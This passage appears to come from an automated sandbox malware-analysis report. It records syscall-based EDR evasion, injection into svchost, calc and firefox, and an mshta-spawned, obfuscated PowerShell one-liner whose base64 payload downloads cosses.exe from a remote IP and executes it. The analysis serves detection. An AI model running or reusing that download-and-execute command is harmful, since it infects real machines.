                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D6E0 mov eax, dword ptr fs:[00000030h]7_2_0365D6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D6E0 mov eax, dword ptr fs:[00000030h]7_2_0365D6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036636EF mov eax, dword ptr fs:[00000030h]7_2_036636EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036ED6F0 mov eax, dword ptr fs:[00000030h]7_2_036ED6F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0366A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A6C7 mov eax, dword ptr fs:[00000030h]7_2_0366A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF6C7 mov eax, dword ptr fs:[00000030h]7_2_036EF6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036616CF mov eax, dword ptr fs:[00000030h]7_2_036616CF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C6A6 mov eax, dword ptr fs:[00000030h]7_2_0366C6A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D6AA mov eax, dword ptr fs:[00000030h]7_2_0362D6AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D6AA mov eax, dword ptr fs:[00000030h]7_2_0362D6AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036276B2 mov eax, dword ptr fs:[00000030h]7_2_036276B2
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_001680A9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013A124 SetUnhandledExceptionFilter,6_2_0013A124
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0013A155

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell decode and execute
                  Source: Yara matchFile source: amsi32_8812.amsi.csv, type: OTHER
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtQuerySystemInformation: Direct from: 0x772748CCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtQueryVolumeInformationFile: Direct from: 0x77272F2CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtOpenSection: Direct from: 0x77272E0CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtClose: Direct from: 0x77272B6C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtReadVirtualMemory: Direct from: 0x77272E8CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtCreateKey: Direct from: 0x77272C6CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtSetInformationThread: Direct from: 0x77272B4CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtQueryAttributesFile: Direct from: 0x77272E6CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtAllocateVirtualMemory: Direct from: 0x772748ECJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtQueryInformationToken: Direct from: 0x77272CACJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtTerminateThread: Direct from: 0x77272FCCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtOpenKeyEx: Direct from: 0x77272B9CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtDeviceIoControlFile: Direct from: 0x77272AECJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtAllocateVirtualMemory: Direct from: 0x77272BECJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtProtectVirtualMemory: Direct from: 0x77267B2EJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtCreateFile: Direct from: 0x77272FECJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtOpenFile: Direct from: 0x77272DCCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtWriteVirtualMemory: Direct from: 0x77272E3CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtMapViewOfSection: Direct from: 0x77272D1CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtResumeThread: Direct from: 0x772736ACJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtProtectVirtualMemory: Direct from: 0x77272F9CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtSetInformationProcess: Direct from: 0x77272C5CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtNotifyChangeKey: Direct from: 0x77273C2CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtCreateMutant: Direct from: 0x772735CCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtSetInformationThread: Direct from: 0x772663F9Jump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtQueryInformationProcess: Direct from: 0x77272C26Jump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtResumeThread: Direct from: 0x77272FBCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtCreateUserProcess: Direct from: 0x7727371CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtWriteVirtualMemory: Direct from: 0x7727490CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtAllocateVirtualMemory: Direct from: 0x77273C9CJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtAllocateVirtualMemory: Direct from: 0x77272BFCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtReadFile: Direct from: 0x77272ADCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtQuerySystemInformation: Direct from: 0x77272DFCJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeNtDelayExecution: Direct from: 0x77272DDCJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Roaming\cosses.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\calc.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: NULL target: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: NULL target: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 8240Jump to behavior
                  Queues an APC in another process (thread injection)
                  Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Roaming\cosses.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BC2008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001687B1 LogonUserW,6_2_001687B1
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00113B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00113B3A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_001148D7
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00174C27 mouse_event,6_2_00174C27
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cosses.exe "C:\Users\user\AppData\Roaming\cosses.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\cosses.exe" Jump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeProcess created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgoxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklxrzceugicagicagicagicagicagicagicagicagicagicagicaglw1fbujlcmrfrmlosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vti5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbiagz1dnvwcenolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb1ympcb2gsdwludcagicagicagicagicagicagicagicagicagicagicagicbhdxrnsgflleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbnz3dvdmvvt1hkktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1licagicagicagicagicagicagicagicagicagicagicagicjmiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzxnqywnlicagicagicagicagicagicagicagicagicagicagicagigrobligicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakaje6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4ync81mzavy29zc2vzlmv4zsisiirfbly6qvbqrefuqvxjb3nzzxmuzxhliiwwldapo3n0yvj0lvnsruvqkdmpo2ludk9rzs1pdgvnicagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcy29zc2vzlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgoxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklxrzceugicagicagicagicagicagicagicagicagicagicagicaglw1fbujlcmrfrmlosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vti5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbiagz1dnvwcenolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb1ympcb2gsdwludcagicagicagicagicagicagicagicagicagicagicagicbhdxrnsgflleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbnz3dvdmvvt1hkktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1licagicagicagicagicagicagicagicagicagicagicagicjmiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzxnqywnlicagicagicagicagicagicagicagicagicagicagicagigrobligicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakaje6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4ync81mzavy29zc2vzlmv4zsisiirfbly6qvbqrefuqvxjb3nzzxmuzxhliiwwldapo3n0yvj0lvnsruvqkdmpo2ludk9rzs1pdgvnicagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcy29zc2vzlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgoxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklxrzceugicagicagicagicagicagicagicagicagicagicagicaglw1fbujlcmrfrmlosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vti5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbiagz1dnvwcenolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb1ympcb2gsdwludcagicagicagicagicagicagicagicagicagicagicagicbhdxrnsgflleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbnz3dvdmvvt1hkktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1licagicagicagicagicagicagicagicagicagicagicagicjmiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzxnqywnlicagicagicagicagicagicagicagicagicagicagicagigrobligicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakaje6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4ync81mzavy29zc2vzlmv4zsisiirfbly6qvbqrefuqvxjb3nzzxmuzxhliiwwldapo3n0yvj0lvnsruvqkdmpo2ludk9rzs1pdgvnicagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcy29zc2vzlmv4zsi='+[char]34+'))')))"Jump to behavior
